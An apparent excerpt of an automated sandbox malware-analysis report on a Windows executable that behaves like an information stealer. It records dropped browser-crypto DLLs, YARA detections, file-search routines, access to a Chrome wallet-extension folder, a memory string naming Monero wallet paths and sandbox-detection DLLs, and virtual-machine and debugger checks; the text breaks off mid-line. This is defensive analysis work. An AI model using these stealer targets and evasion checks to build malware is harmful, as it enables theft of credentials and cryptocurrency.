                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: winhttp.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: mswsock.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: iphlpapi.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: winnsi.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: urlmon.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: srvcli.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: netutils.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: dnsapi.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: rasadhlp.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: fwpuclnt.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: schannel.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: mskeyprotect.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: msasn1.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: dpapi.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: cryptsp.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: rsaenh.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: cryptbase.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: gpapi.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: ncryptsslp.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: wbemcomn.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: amsi.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: userenv.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: version.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: uxtheme.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: sxs.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: ntmarta.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: mozglue.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: wsock32.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: vcruntime140.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: msvcp140.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: vcruntime140.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: windowscodecs.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: propsys.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: windows.fileexplorer.common.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: apphelp.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: ntshrui.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: linkinfo.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: edputil.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: wintypes.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: appresolver.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: bcp47langs.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: slc.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: sppc.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: pcacli.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: mpr.dll
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe Section loaded: sfc_os.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: UMrFwHyjUi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: UMrFwHyjUi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: UMrFwHyjUi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: UMrFwHyjUi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: UMrFwHyjUi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: UMrFwHyjUi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: UMrFwHyjUi.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: Binary string: mozglue.pdbP source: UMrFwHyjUi.exe, 00000002.00000002.2720919729.000000006CEFD000.00000002.00000001.01000000.00000009.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.2.dr
                          Source: Binary string: freebl3.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                          Source: Binary string: freebl3.pdbp source: UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                          Source: Binary string: nss3.pdb@ source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.2.dr
                          Source: Binary string: softokn3.pdb@ source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2712188709.0000000035E57000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2705821873.0000000029F71000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
                          Source: Binary string: nss3.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.2.dr
                          Source: Binary string: mozglue.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2720919729.000000006CEFD000.00000002.00000001.01000000.00000009.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.2.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
                          Source: UMrFwHyjUi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: UMrFwHyjUi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: UMrFwHyjUi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: UMrFwHyjUi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: UMrFwHyjUi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00418995 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00418995
                          Source: UMrFwHyjUi.exeStatic PE information: section name: .bsp
                          Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
                          Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
                          Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                          Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
                          Source: nss3.dll.2.drStatic PE information: section name: .00cfg
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001F11F2 push ecx; ret 0_2_001F1205
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001F1540 push esp; retn 0003h0_2_001F1545
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001F1570 push cs; ret 0_2_001F1571
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_0019992C push ecx; ret 0_2_0019993F
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001F3B75 push 0000004Ch; iretd 0_2_001F3B86
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001DFE65 push ecx; ret 0_2_001DFE78
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_00192F17 push eax; ret 0_2_00192F76
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_0019992C push ecx; ret 1_2_0019993F
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_00192F17 push eax; ret 1_2_00192F76
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0042F192 push ecx; ret 2_2_0042F1A5
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00422D89 push esi; ret 2_2_00422D8B
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0041DE05 push ecx; ret 2_2_0041DE18
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00432715 push 0000004Ch; iretd 2_2_00432726
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          Source: Yara matchFile source: 0.2.UMrFwHyjUi.exe.1c2c60.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.UMrFwHyjUi.exe.400000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.UMrFwHyjUi.exe.1c2c60.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.UMrFwHyjUi.exe.400000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.UMrFwHyjUi.exe.190000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: UMrFwHyjUi.exe PID: 1004, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: UMrFwHyjUi.exe PID: 5768, type: MEMORYSTR
                          Source: c:\users\user\desktop\umrfwhyjui.exeEvent Logs and Signature results: Application crash and keyboard check
                          Source: UMrFwHyjUi.exeBinary or memory string: DIR_WATCH.DLL
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
                          Source: UMrFwHyjUi.exeBinary or memory string: SBIEDLL.DLL
                          Source: UMrFwHyjUi.exeBinary or memory string: API_LOG.DLL
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,2_2_0040180D
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeAPI coverage: 3.7 %
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeAPI coverage: 6.3 %
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 8024Thread sleep count: 82 > 30Jump to behavior
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00410DB0 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EC3h2_2_00410DB0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001AD2FE FindFirstFileExW,0_2_001AD2FE
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_001AD2FE FindFirstFileExW,1_2_001AD2FE
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00416013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00416013
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0041547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_0041547D
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00409CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00409CF1
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00414D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,2_2_00414D08
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00401D80
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0040D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040D59B
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0040B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040B5B4
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0040BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040BF22
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0040B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040B914
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00415B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00415B4D
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0040CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_0040CD0C
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00415182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,2_2_00415182
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00410F8F GetSystemInfo,wsprintfA,2_2_00410F8F
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: Amcache.hve.5.drBinary or memory string: VMware
                          Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                          Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                          Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                          Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000D8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                          Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                          Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                          Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                          Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                          Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000D20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                          Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                          Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                          Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeAPI call chain: ExitProcess graph end nodegraph_2-73878
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeAPI call chain: ExitProcess graph end nodegraph_2-73894
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeAPI call chain: ExitProcess graph end nodegraph_2-75218
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeProcess information queried: ProcessInformation
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_00192F17 LdrInitializeThunk,0_2_00192F17
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_0019A085 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0019A085
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00418995 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_